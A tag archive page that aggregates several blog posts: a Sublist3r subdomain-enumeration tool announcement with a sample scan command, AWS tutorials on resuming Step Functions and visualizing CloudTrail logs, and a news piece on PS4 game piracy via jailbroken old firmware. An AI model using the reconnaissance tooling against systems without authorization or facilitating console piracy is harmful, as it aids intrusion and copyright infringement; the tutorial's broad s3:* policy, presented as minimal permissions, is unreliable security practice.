Tag Archives: dumps

Sublist3r – Fast Python Subdomain Enumeration Tool

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/sublist3r-fast-python-subdomain-enumeration-tool/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

Sublist3r is a Python-based tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect subdomains for the domains they are targeting.

It also integrates with subbrute for subdomain brute-forcing with word lists.

Features of Sublist3r Subdomain Enumeration Tool

It enumerates subdomains using many search engines such as:

  • Google
  • Yahoo
  • Bing
  • Baidu
  • Ask

The tool also enumerates subdomains using:

  • Netcraft
  • Virustotal
  • ThreatCrowd
  • DNSdumpster
  • ReverseDNS

Requirements of Sublist3r Subdomain Search

It currently supports Python 2 and Python 3.
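
As a quick, hedged illustration (not part of the original announcement), a typical run against a target domain might look like the following once the repository is cloned and its requirements installed; the -b flag pulls in the subbrute integration and -o writes the results to a file:

python sublist3r.py -d example.com -b -t 50 -o example-subdomains.txt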

Read the rest of Sublist3r – Fast Python Subdomain Enumeration Tool now! Only available at Darknet.

Resume AWS Step Functions from Any State

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/resume-aws-step-functions-from-any-state/


Yash Pant, Solutions Architect, AWS


Aaron Friedman, Partner Solutions Architect, AWS

When we discuss how to build applications with customers, we often align to the Well-Architected Framework pillars of security, reliability, performance efficiency, cost optimization, and operational excellence. Designing for failure is an essential component of developing well-architected applications that are resilient to spurious errors that may occur.

There are many ways you can use AWS services to achieve high availability and resiliency of your applications. For example, you can couple Elastic Load Balancing with Auto Scaling and Amazon EC2 instances to build highly available applications. Or use Amazon API Gateway and AWS Lambda to rapidly scale out a microservices-based architecture. Many AWS services have built-in solutions to help with appropriate error handling, such as Dead Letter Queues (DLQ) for Amazon SQS or retries in AWS Batch.

AWS Step Functions is an AWS service that makes it easy for you to coordinate the components of distributed applications and microservices. Step Functions allows you to easily design for failure, by incorporating features such as error retries and custom error handling from AWS Lambda exceptions. These features allow you to programmatically handle many common error modes and build robust, reliable applications.

In some rare cases, however, your application may fail in an unexpected manner. In these situations, you might not want to duplicate in a repeat execution those portions of your state machine that have already run. This is especially true when orchestrating long-running jobs or executing a complex state machine as part of a microservice. Here, you need to know the last successful state in your state machine from which to resume, so that you don’t duplicate previous work. In this post, we present a solution to enable you to resume from any given state in your state machine in the case of an unexpected failure.

Resuming from a given state

To resume a failed state machine execution from the state at which it failed, you first run a script that dynamically creates a new state machine. When the new state machine is executed, it resumes the failed execution from the point of failure. The script contains the following two primary steps:

  1. Parse the execution history of the failed execution to find the name of the state at which it failed, as well as the JSON input to that state.
  2. Create a new state machine, which adds an additional state, called "GoToState", to the failed state machine. "GoToState" is a choice state at the beginning of the state machine that branches execution directly to the failed state, allowing you to skip states that succeeded in the previous execution.

The full script along with a CloudFormation template that creates a demo of this is available in the aws-sfn-resume-from-any-state GitHub repo.

Diving into the script

In this section, we walk you through the script and highlight the core components of its functionality. The script contains a main function, which adds a command line parameter for the failedExecutionArn so that you can easily call the script from the command line:

python gotostate.py --failedExecutionArn '<Failed_Execution_Arn>'

Identifying the failed state in your execution

First, the script extracts the name of the failed state along with the input to that state. It does so by using the failed state machine execution history, which is identified by the Amazon Resource Name (ARN) of the execution. The failed state is marked in the execution history, along with the input to that state (which is also the output of the preceding successful state). The script is able to parse these values from the log.

The script loops through the execution history of the failed state machine, and traces it backwards until it finds the failed state. If the state machine failed in a parallel state, then it must restart from the beginning of the parallel state. The script is able to capture the name of the parallel state that failed, rather than any substate within the parallel state that may have caused the failure. The following code is the Python function that does this.


def parseFailureHistory(failedExecutionArn):

    '''
    Parses the execution history of a failed state machine to get the name of failed state and the input to the failed state:
    Input failedExecutionArn = A string containing the execution ARN of a failed state machine
    Output = A list with two elements: [name of failed state, input to failed state]
    '''
    failedAtParallelState = False
    try:
        #Get the execution history
        response = client.get_execution_history(
            executionArn=failedExecutionArn,
            reverseOrder=True
        )
        failedEvents = response['events']
    except Exception as ex:
        raise ex
    #Confirm that the execution actually failed, raise exception if it didn't fail.
    try:
        failedEvents[0]['executionFailedEventDetails']
    except:
        raise Exception('Execution did not fail')
        
    '''
    If you have a 'States.Runtime' error (for example, if a task state in your state machine attempts to execute a Lambda function in a different region than the state machine), get the ID of the failed state, and use it to determine the failed state name and input.
    '''
    
    if failedEvents[0]['executionFailedEventDetails']['error'] == 'States.Runtime':
        failedId = int(filter(str.isdigit, str(failedEvents[0]['executionFailedEventDetails']['cause'].split()[13])))
        failedState = failedEvents[-1 * failedId]['stateEnteredEventDetails']['name']
        failedInput = failedEvents[-1 * failedId]['stateEnteredEventDetails']['input']
        return (failedState, failedInput)
        
    '''
    You need to loop through the execution history, tracing back the executed steps.
    The first state you encounter is the failed state. If you failed on a parallel state, you need the name of the parallel state rather than the name of a state within a parallel state that it failed on. This is because you can only attach goToState to the parallel state, but not a substate within the parallel state.
    This loop starts with the ID of the latest event and uses the previous event IDs to trace back the execution to the beginning (id 0). However, it returns as soon as it finds the name of the failed state.
    '''

    currentEventId = failedEvents[0]['id']
    while currentEventId != 0:
        #multiply event ID by -1 for indexing because you're looking at the reversed history
        currentEvent = failedEvents[-1 * currentEventId]
        
        '''
        You can determine whether the failed state was a parallel state because an event with 'type'='ParallelStateFailed' appears in the execution history before the name of the failed state
        '''

        if currentEvent['type'] == 'ParallelStateFailed':
            failedAtParallelState = True

        '''
        If the failed state is not a parallel state, then the name of failed state to return is the name of the state in the first 'TaskStateEntered' event type you run into when tracing back the execution history
        '''

        if currentEvent['type'] == 'TaskStateEntered' and failedAtParallelState == False:
            failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)

        '''
        If the failed state was a parallel state, then you need to trace execution back to the first event with 'type'='ParallelStateEntered', and return the name of the state
        '''

        if currentEvent['type'] == 'ParallelStateEntered' and failedAtParallelState:
            failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)
        #Update the ID for the next execution of the loop
        currentEventId = currentEvent['previousEventId']
        

Create the new state machine

The script uses the name of the failed state to create the new state machine, with "GoToState" branching execution directly to the failed state.

To do this, the script requires the Amazon States Language (ASL) definition of the failed state machine. It modifies the definition to append "GoToState", and creates a new state machine from it.

The script gets the ARN of the failed state machine from the ARN of the failed execution. This ARN allows it to get the ASL definition of the failed state machine by calling the DescribeStateMachine API action. It then creates a new state machine with "GoToState".

When the script creates the new state machine, it also adds an additional input variable called "resuming". When you execute this new state machine, you specify this resuming variable as true in the input JSON. This tells "GoToState" to branch execution to the state that had previously failed. Here’s the function that does this:

def attachGoToState(failedStateName, stateMachineArn):

    '''
    Given a state machine ARN and the name of a state in that state machine, create a new state machine that starts at a new choice state called 'GoToState'. "GoToState" branches to the named state, and sends the input of the state machine to that state, when a variable called "resuming" is set to True.
    Input failedStateName = A string with the name of the failed state
          stateMachineArn = A string with the ARN of the state machine
    Output response from the create_state_machine call, which is the API call that creates a new state machine
    '''

    try:
        response = client.describe_state_machine(
            stateMachineArn=stateMachineArn
        )
    except:
        raise Exception('Could not get ASL definition of state machine')
    roleArn = response['roleArn']
    stateMachine = json.loads(response['definition'])
    #Create a name for the new state machine
    newName = response['name'] + '-with-GoToState'
    #Get the StartAt state for the original state machine, because you point the 'GoToState' to this state
    originalStartAt = stateMachine['StartAt']

    '''
    Create the GoToState with the variable $.resuming.
    If the new state machine is executed with $.resuming = True, then the state machine skips to the failed state.
    Otherwise, it executes the state machine from the original start state.
    '''

    goToState = {'Type':'Choice', 'Choices':[{'Variable':'$.resuming', 'BooleanEquals':False, 'Next':originalStartAt}], 'Default':failedStateName}
    #Add GoToState to the set of states in the new state machine
    stateMachine['States']['GoToState'] = goToState
    #Add StartAt
    stateMachine['StartAt'] = 'GoToState'
    #Create new state machine
    try:
        response = client.create_state_machine(
            name=newName,
            definition=json.dumps(stateMachine),
            roleArn=roleArn
        )
    except:
        raise Exception('Failed to create new state machine with GoToState')
    return response
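
For reference, a minimal sketch of the main function that ties these two pieces together might look like the following. The real implementation lives in the aws-sfn-resume-from-any-state repo; the use of describe_execution to look up the state machine ARN and the printed output are assumptions of this sketch:

import argparse
import boto3

client = boto3.client('stepfunctions')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--failedExecutionArn', required=True,
                        help='Execution ARN of the failed state machine execution')
    args = parser.parse_args()

    #Find the failed state and the input it received
    failedState, failedInput = parseFailureHistory(args.failedExecutionArn)

    #Look up the state machine that owns the failed execution
    stateMachineArn = client.describe_execution(
        executionArn=args.failedExecutionArn
    )['stateMachineArn']

    #Create the new state machine with GoToState attached
    response = attachGoToState(failedState, stateMachineArn)
    print('New state machine ARN: ' + response['stateMachineArn'])
    print('Input to the failed state: ' + failedInput)

if __name__ == '__main__':
    main()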

Testing the script

Now that you understand how the script works, you can test it out.

The following screenshot shows an example state machine that has failed, called "TestMachine". This state machine successfully completed "FirstState" and "ChoiceState", but when it branched to "FirstMatchState", it failed.

Use the script to create a new state machine that allows you to rerun this state machine, but skip the "FirstState" and the "ChoiceState" steps that already succeeded. You can do this by calling the script as follows:

python gotostate.py --failedExecutionArn 'arn:aws:states:us-west-2:<AWS_ACCOUNT_ID>:execution:TestMachine-with-GoToState:b2578403-f41d-a2c7-e70c-7500045288595'

This creates a new state machine called "TestMachine-with-GoToState", and returns its ARN, along with the input that had been sent to "FirstMatchState". You can then inspect the input to determine what caused the error. In this case, you notice that the input to "FirstMatchState" was the following:

{
  "foo": 1,
  "Message": true
}

However, this state machine expects the "Message" field of the JSON to be a string rather than a Boolean. Execute the new "TestMachine-with-GoToState" state machine, change the input to be a string, and add the "resuming" variable that "GoToState" requires:

{
  "foo": 1,
  "Message": "Hello!",
  "resuming": true
}
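
If you prefer to start the resumed execution from code rather than from the console, a hedged boto3 sketch might look like this; the state machine ARN below is a placeholder:

import json
import boto3

sfn = boto3.client('stepfunctions')

#Placeholder ARN for the state machine created by the script
newStateMachineArn = 'arn:aws:states:us-west-2:<AWS_ACCOUNT_ID>:stateMachine:TestMachine-with-GoToState'

#Corrected input, plus the "resuming" flag that "GoToState" checks
resumeInput = {
    "foo": 1,
    "Message": "Hello!",
    "resuming": True
}

response = sfn.start_execution(
    stateMachineArn=newStateMachineArn,
    input=json.dumps(resumeInput)
)
print(response['executionArn'])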

When you execute the new state machine, it skips "FirstState" and "ChoiceState", and goes directly to "FirstMatchState", which was the state that failed:

Look at what happens when you have a state machine with multiple parallel steps. This example is included in the GitHub repository associated with this post. The repo contains a CloudFormation template that sets up this state machine and provides instructions to replicate this solution.

The following state machine, "ParallelStateMachine", takes an input through two subsequent parallel states before doing some final processing and exiting. The JSON below shows the ASL definition of the state machine.

{
  "Comment": "An example of the Amazon States Language using a parallel state to execute two branches at the same time.",
  "StartAt": "Parallel",
  "States": {
    "Parallel": {
      "Type": "Parallel",
      "ResultPath":"$.output",
      "Next": "Parallel 2",
      "Branches": [
        {
          "StartAt": "Parallel Step 1, Process 1",
          "States": {
            "Parallel Step 1, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 1, Process 2",
          "States": {
            "Parallel Step 1, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        }
      ]
    },
    "Parallel 2": {
      "Type": "Parallel",
      "Next": "Final Processing",
      "Branches": [
        {
          "StartAt": "Parallel Step 2, Process 1",
          "States": {
            "Parallel Step 2, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 2, Process 2",
          "States": {
            "Parallel Step 2, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        }
      ]
    },
    "Final Processing": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC",
      "End": true
    }
  }
}

First, use an input that initially fails:

{
  "Message": "Hello!"
}

This fails because the second parallel state expects the input JSON to contain a variable called "foo" in order to run "Parallel Step 2, Process 1" and "Parallel Step 2, Process 2". Instead, the original input gets processed by the first parallel state and produces the following output to pass to the second parallel state:

{
  "output": [
    {
      "Message": "Hello!"
    },
    {
      "Message": "Hello!"
    }
  ]
}

Run the script on the failed state machine to create a new state machine that allows it to resume directly at the second parallel state instead of having to redo the first parallel state. This creates a new state machine called "ParallelStateMachine-with-GoToState". The following JSON was created by the script to define the new state machine in ASL. It contains the "GoToState" value that was attached by the script.

{
   "Comment":"An example of the Amazon States Language using a parallel state to execute two branches at the same time.",
   "States":{
      "Final Processing":{
         "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC",
         "End":true,
         "Type":"Task"
      },
      "GoToState":{
         "Default":"Parallel 2",
         "Type":"Choice",
         "Choices":[
            {
               "Variable":"$.resuming",
               "BooleanEquals":false,
               "Next":"Parallel"
            }
         ]
      },
      "Parallel":{
         "Branches":[
            {
               "States":{
                  "Parallel Step 1, Process 1":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 1, Process 1"
            },
            {
               "States":{
                  "Parallel Step 1, Process 2":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:LambdaA",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 1, Process 2"
            }
         ],
         "ResultPath":"$.output",
         "Type":"Parallel",
         "Next":"Parallel 2"
      },
      "Parallel 2":{
         "Branches":[
            {
               "States":{
                  "Parallel Step 2, Process 1":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 2, Process 1"
            },
            {
               "States":{
                  "Parallel Step 2, Process 2":{
                     "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
                     "End":true,
                     "Type":"Task"
                  }
               },
               "StartAt":"Parallel Step 2, Process 2"
            }
         ],
         "Type":"Parallel",
         "Next":"Final Processing"
      }
   },
   "StartAt":"GoToState"
}

You can then execute this state machine with the correct input by adding the "foo" and "resuming" variables:

{
  "foo": 1,
  "output": [
    {
      "Message": "Hello!"
    },
    {
      "Message": "Hello!"
    }
  ],
  "resuming": true
}

This yields the following result. Notice that this time, the state machine executed successfully to completion, and skipped the steps that had previously failed.


Conclusion

When you’re building out complex workflows, it’s important to be prepared for failure. You can do this by taking advantage of features such as automatic error retries in Step Functions and custom error handling of Lambda exceptions.

Nevertheless, state machines still have the possibility of failing. With the methodology and script presented in this post, you can resume a failed state machine from its point of failure. This allows you to skip the execution of steps in the workflow that had already succeeded, and recover the process from the point of failure.

To see more examples, please visit the Step Functions Getting Started page.

If you have questions or suggestions, please comment below.

Visualize AWS CloudTrail Logs Using AWS Glue and Amazon QuickSight

Post Syndicated from Luis Caro Perez original https://aws.amazon.com/blogs/big-data/streamline-aws-cloudtrail-log-visualization-using-aws-glue-and-amazon-quicksight/

Being able to easily visualize AWS CloudTrail logs gives you a better understanding of how your AWS infrastructure is being used. It can also help you audit and review AWS API calls and detect security anomalies inside your AWS account. To do this, you must be able to perform analytics based on your CloudTrail logs.

In this post, I walk through using AWS Glue and AWS Lambda to convert AWS CloudTrail logs from JSON to a query-optimized format dataset in Amazon S3. I then use Amazon Athena and Amazon QuickSight to query and visualize the data.

Solution overview

To process CloudTrail logs, you must implement the following architecture:

CloudTrail delivers log files to a folder in an Amazon S3 bucket. To correctly crawl these logs, you modify the file contents and folder structure using an Amazon S3-triggered Lambda function that stores the transformed files in a single folder in an S3 bucket. When the files are in a single folder, AWS Glue scans the data, converts it into Apache Parquet format, and catalogs it to allow for querying and visualization using Amazon Athena and Amazon QuickSight.

Walkthrough

Let’s look at the steps that are required to build the solution.

Set up CloudTrail logs

First, you need to set up a trail that delivers log files to an S3 bucket. To create a trail in CloudTrail, follow the instructions in Creating a Trail.

When you finish, the trail settings page should look like the following screenshot:

In this example, I set up log files to be delivered to the cloudtraillfcaro bucket.

Consolidate CloudTrail reports into a single folder using Lambda

AWS CloudTrail delivers log files using the following folder structure inside the configured Amazon S3 bucket:

AWSLogs/ACCOUNTID/CloudTrail/REGION/YEAR/MONTH/DAY/filename.json.gz

Additionally, log files have the following structure:

{
    "Records": [{
        "eventVersion": "1.01",
        "userIdentity": {
            "type": "IAMUser",
            "principalId": "AIDAJDPLRKLG7UEXAMPLE",
            "arn": "arn:aws:iam::123456789012:user/Alice",
            "accountId": "123456789012",
            "accessKeyId": "AKIAIOSFODNN7EXAMPLE",
            "userName": "Alice",
            "sessionContext": {
                "attributes": {
                    "mfaAuthenticated": "false",
                    "creationDate": "2014-03-18T14:29:23Z"
                }
            }
        },
        "eventTime": "2014-03-18T14:30:07Z",
        "eventSource": "cloudtrail.amazonaws.com",
        "eventName": "StartLogging",
        "awsRegion": "us-west-2",
        "sourceIPAddress": "72.21.198.64",
        "userAgent": "signin.amazonaws.com",
        "requestParameters": {
            "name": "Default"
        },
        "responseElements": null,
        "requestID": "cdc73f9d-aea9-11e3-9d5a-835b769c0d9c",
        "eventID": "3074414d-c626-42aa-984b-68ff152d6ab7"
    },
    ... additional entries ...
    ]
}

If AWS Glue crawlers are used to catalog these files as they are written, the following obstacles arise:

  1. AWS Glue identifies a different table for each folder, because the folders don’t follow a traditional partition format.
  2. Based on the structure of the file content, AWS Glue identifies the tables as having a single column of type array.
  3. CloudTrail logs have JSON attributes that use uppercase letters. According to the Best Practices When Using Athena with AWS Glue, it is recommended that you convert these to lowercase.

To have AWS Glue catalog all log files in a single table with all the columns describing each event, implement the following Lambda function:

from __future__ import print_function
import json
import urllib
import boto3
import gzip

s3 = boto3.resource('s3')
client = boto3.client('s3')

def convertColumntoLowwerCaps(obj):
    for key in obj.keys():
        new_key = key.lower()
        if new_key != key:
            obj[new_key] = obj[key]
            del obj[key]
    return obj


def lambda_handler(event, context):

    bucket = event['Records'][0]['s3']['bucket']['name']
    key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
    print(bucket)
    print(key)
    try:
        newKey = 'flatfiles/' + key.replace("/", "")
        client.download_file(bucket, key, '/tmp/file.json.gz')
        with gzip.open('/tmp/out.json.gz', 'w') as output, gzip.open('/tmp/file.json.gz', 'rb') as file:
            i = 0
            for line in file:
                for record in json.loads(line, object_hook=convertColumntoLowwerCaps)['records']:
                    if i != 0:
                        output.write("\n")
                    output.write(json.dumps(record))
                    i += 1
        client.upload_file('/tmp/out.json.gz', bucket,newKey)
        return "success"
    except Exception as e:
        print(e)
        print('Error processing object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))
        raise e

The function goes over each element of the records array, changes uppercase letters to lowercase in column names, and inserts each element of the array as a single line of a new file. The new file is saved inside a flatfiles folder created by the function without any subfolders in the S3 bucket.

The function should have a role containing a policy with at least the following permissions:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "s3:*"
            ],
            "Resource": [
                "arn:aws:s3:::cloudtraillfcaro/*",
                "arn:aws:s3:::cloudtraillfcaro"
            ],
            "Effect": "Allow"
        }
    ]
}

In this example, CloudTrail delivers logs to the cloudtraillfcaro bucket. Make sure that you replace this name with your bucket name in the policy. For more information about how to work with inline policies, see Working with Inline Policies.

After the Lambda function is created, you can set up the following trigger using the Triggers tab on the AWS Lambda console.

Choose Add trigger, and choose S3 as a source of the trigger.

After choosing the source, configure the following settings:

In the trigger, any file that is written to the path for the log files—which in this case is AWSLogs/119582755581/CloudTrail/—is processed. Make sure that the Enable trigger check box is selected and that the bucket and prefix parameters match your use case.
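
If you would rather wire up this trigger programmatically than through the console, a minimal sketch along the following lines should work; the bucket, account ID, and function ARN are placeholders, and it assumes the Lambda function's resource policy already allows S3 to invoke it:

import boto3

s3 = boto3.client('s3')

#Placeholders: replace the bucket, account ID, and Lambda function ARN with your own
s3.put_bucket_notification_configuration(
    Bucket='cloudtraillfcaro',
    NotificationConfiguration={
        'LambdaFunctionConfigurations': [{
            'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:<AWS_ACCOUNT_ID>:function:cloudtrail-flattener',
            'Events': ['s3:ObjectCreated:*'],
            'Filter': {
                'Key': {
                    'FilterRules': [
                        {'Name': 'prefix', 'Value': 'AWSLogs/<AWS_ACCOUNT_ID>/CloudTrail/'}
                    ]
                }
            }
        }]
    }
)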

After you set up the function and receive log files, the bucket (in this case cloudtraillfcaro) should contain the processed files inside the flatfiles folder.

Catalog source data

Once the files are processed by the Lambda function, set up a crawler named cloudtrail to catalog them.

The crawler must point to the flatfiles folder.
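
If you prefer to create this crawler from code instead of the console, a hedged sketch using boto3 might look like the following; the role name is a placeholder and must carry the permissions described below:

import boto3

glue = boto3.client('glue')

#Placeholder role name; it needs AWSGlueServiceRole plus S3 access to the bucket
glue.create_crawler(
    Name='cloudtrail',
    Role='AWSGlueServiceRole-cloudtrail',
    DatabaseName='cloudtrail',
    Targets={'S3Targets': [{'Path': 's3://cloudtraillfcaro/flatfiles/'}]}
)
glue.start_crawler(Name='cloudtrail')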

All the crawlers and AWS Glue jobs created for this solution must have a role with the AWSGlueServiceRole managed policy and an inline policy with permissions to modify the S3 buckets used on the Lambda function. For more information, see Working with Managed Policies.

The role should look like the following:

In this example, the inline policy named s3perms contains the permissions to modify the S3 buckets.

After you choose the role, you can schedule the crawler to run on demand.

A new database is created, and the crawler is set to use it. In this case, the cloudtrail database is used for all the tables.

After the crawler runs, a single table should be created in the catalog with the following structure:

The table should contain the following columns:

Create and run the AWS Glue job

To convert all the CloudTrail logs to a columnar store in Parquet, set up an AWS Glue job by following these steps.

Upload the following script into a bucket in Amazon S3:

import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
import boto3
import time

## @params: [JOB_NAME]
args = getResolvedOptions(sys.argv, ['JOB_NAME'])

sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)

datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "cloudtrail", table_name = "flatfiles", transformation_ctx = "datasource0")
resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "make_struct", transformation_ctx = "resolvechoice1")
relationalized1 = resolvechoice1.relationalize("trail", args["TempDir"]).select("trail")
datasink = glueContext.write_dynamic_frame.from_options(frame = relationalized1, connection_type = "s3", connection_options = {"path": "s3://cloudtraillfcaro/parquettrails"}, format = "parquet", transformation_ctx = "datasink4")
job.commit()

In the example, you load the script as a file named cloudtrailtoparquet.py. Make sure that you modify the script and replace the path "s3://cloudtraillfcaro/parquettrails" with the destination in which you want to store your results.

After uploading the script, add a new AWS Glue job. Choose a name and role for the job, and choose the option of running the job from An existing script that you provide.

To avoid processing the same data twice, enable the Job bookmark setting in the Advanced properties section of the job properties.

Choose Next twice, and then choose Finish.

If logs are already in the flatfiles folder, you can run the job on demand to generate the first set of results.
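
For example, a run can be started from code with a call like the following; the job name here assumes you named the job after the script:

import boto3

glue = boto3.client('glue')

#Start the job on demand; use whatever name you gave the job when creating it
run = glue.start_job_run(JobName='cloudtrailtoparquet')
print(run['JobRunId'])

#Optionally check on its status
status = glue.get_job_run(JobName='cloudtrailtoparquet', RunId=run['JobRunId'])
print(status['JobRun']['JobRunState'])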

Once the job starts running, wait for it to complete.

When the job is finished, its Run status should be Succeeded. After that, you can verify that the Parquet files are written to the Amazon S3 location.

Catalog results

To be able to query the results with Athena, you can use an AWS Glue crawler to catalog the output of the AWS Glue job.

In this example, the crawler is set to use the same database as the source named cloudtrail.

You can run the crawler using the console. When the crawler finishes running and has processed the Parquet results, a new table should be created in the AWS Glue Data Catalog. In this example, it’s named parquettrails.

The table should have the classification set to parquet.

It should have the same columns as the flatfiles table, with the exception of the struct type columns, which should be relationalized into several columns:

In this example, notice how the requestparameters column, which was a struct in the original table (flatfiles), was transformed to several columns—one for each key value inside it. This is done using a transformation native to AWS Glue called relationalize.

Query results with Athena

After crawling the results, you can query them using Athena. For example, to query what events took place in the time frame between 2017-10-23T12:00:00 and 2017-10-23T13:00:00, use the following SELECT statement:

select *
from cloudtrail.parquettrails
where eventtime > '2017-10-23T12:00:00Z' AND eventtime < '2017-10-23T13:00:00Z'
order by eventtime asc;

Be sure to replace cloudtrail.parquettrails with the names of your database and table that references the Parquet results. Replace the datetimes with an hour when your account had activity and was processed by the AWS Glue job.
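
If you want to run the same query outside the Athena console, a hedged boto3 sketch looks like this; the results bucket is a placeholder:

import boto3

athena = boto3.client('athena')

query = """
select *
from cloudtrail.parquettrails
where eventtime > '2017-10-23T12:00:00Z' AND eventtime < '2017-10-23T13:00:00Z'
order by eventtime asc
"""

#Placeholder output location for Athena query results
execution = athena.start_query_execution(
    QueryString=query,
    QueryExecutionContext={'Database': 'cloudtrail'},
    ResultConfiguration={'OutputLocation': 's3://<your-athena-results-bucket>/'}
)
print(execution['QueryExecutionId'])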

Visualize results using Amazon QuickSight

Once you can query the data using Athena, you can visualize it using Amazon QuickSight. Before connecting Amazon QuickSight to Athena, be sure to grant QuickSight access to Athena and the associated S3 buckets in your account. For more information, see Managing Amazon QuickSight Permissions to AWS Resources. You can then create a new data set in Amazon QuickSight based on the Athena table that you created.

After setting up permissions, you can create a new analysis in Amazon QuickSight by choosing New analysis.

Then add a new data set.

Choose Athena as the source.

Give the data source a name (in this case, I named it cloudtrail).

Choose the name of the database and the table referencing the Parquet results.

Then choose Visualize.

After that, you should see the following screen:

Now you can create some visualizations. First, search for the sourceipaddress column, and drag it to the AutoGraph section.

You can see a list of the IP addresses that you have used to interact with AWS. To review whether these IP addresses have been used from IAM users, internal AWS services, or roles, use the type value that is inside the useridentity field of the original log files. Thanks to the relationalize transformation, this value is available as the useridentity.type column. After the column is added into the Group/Color box, the visualization should look like the following:

You can now see and distinguish the most used IPs and whether they are used from roles, AWS services, or IAM users.

After following all these steps, you can use Amazon QuickSight to add different columns from CloudTrail and perform different types of visualizations. You can build operational dashboards that continuously monitor AWS infrastructure usage and access. You can share those dashboards with others in your organization who might need to see this data.

Summary

In this post, you saw how you can use a simple Lambda function and an AWS Glue script to convert text files into Parquet to improve Athena query performance and data compression. The post also demonstrated how to use AWS Lambda to preprocess files in Amazon S3 and transform them into a format that is recognizable by AWS Glue crawlers.

This example used AWS CloudTrail logs, but you can apply the proposed solution to any set of files that, after preprocessing, can be cataloged by AWS Glue.


Additional Reading

Learn how to Harmonize, Query, and Visualize Data from Various Providers using AWS Glue, Amazon Athena, and Amazon QuickSight.


About the Authors

Luis Caro is a Big Data Consultant for AWS Professional Services. He works with our customers to provide guidance and technical assistance on big data projects, helping them improve the value of their solutions when using AWS.

PS4 Piracy Now Exists – If Gamers Want to Jump Through Hoops

Post Syndicated from Andy original https://torrentfreak.com/ps4-piracy-now-exists-if-gamers-want-to-jump-through-hoops-170930/

During the reign of the first few generations of consoles, gamers became accustomed to their machines being compromised by hacking groups and enthusiasts, to enable the execution of third-party software.

Often carried out under the banner of running “homebrew” code, so-called jailbroken consoles also brought with them the prospect of running pirate copies of officially produced games. Once the floodgates were opened, not much could hold things back.

With the advent of mass online gaming, however, things became more complex. Regular firmware updates mean that security holes could be fixed remotely whenever a user went online, rendering the jailbreaking process a cat-and-mouse game with continually moving targets.

This, coupled with massively improved overall security, has meant that the current generation of consoles has remained largely piracy free, at least on a do-it-at-home basis. Now, however, that position is set to change after the first decrypted PS4 game dumps began to hit the web this week.

Thanks to release group KOTF (Knights of the Fallen), Grand Theft Auto V, Far Cry 4, and Assassin’s Creed IV are all available for download from the usual places. As expected they are pretty meaty downloads, with GTAV weighing in via 90 x 500MB files, Far Cry 4 via 54 of the same size, and ACIV sporting 84 x 250MB.

Partial NFO file for PS4 GTA V

While undoubtedly large, it’s not the filesize that will prove most prohibitive when it comes to getting these beasts to run on a PlayStation 4. Indeed, a potential pirate will need to jump through a number of hoops to enjoy any of these titles or others that may appear in the near future.

KOTF explains as much in the NFO (information) files it includes with its releases. The list of requirements is long.

First up, a gamer needs to possess a PS4 with an extremely old firmware version – v1.76 – which was released way back in August 2014. The fact this firmware is required doesn’t come as a surprise since it was successfully jailbroken back in December 2015.

The age of the firmware raises several issues, not least where people can obtain a PS4 that’s so old it still has this firmware intact. Also, newer games require later firmware, so most games released during the past two to three years won’t be compatible with v1.76. That limits the pool of games considerably.

Finally, forget going online with such an old software version. Sony will be all over it like a cheap suit, plotting to do something unpleasant to that cheeky antique code, given half a chance. And, for anyone wondering, downgrading a higher firmware version to v1.76 isn’t possible – yet.

But for gamers who want a little bit of recent PS4 nostalgia on the cheap, ‘all’ they have to do is gather the necessary tools together and follow the instructions below.

Easy – when you know how

While this is a landmark moment for PS4 piracy (which to date has mainly centered around much hocus pocus), the limitations listed above mean that it isn’t going to hit the mainstream just yet.

That being said, all things are possible when given the right people, determination, and enough time. Whether that will be anytime soon is anyone’s guess but there are rumors that firmware v4.55 has already been exploited, so you never know.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Analyzing AWS Cost and Usage Reports with Looker and Amazon Athena

Post Syndicated from Dillon Morrison original https://aws.amazon.com/blogs/big-data/analyzing-aws-cost-and-usage-reports-with-looker-and-amazon-athena/

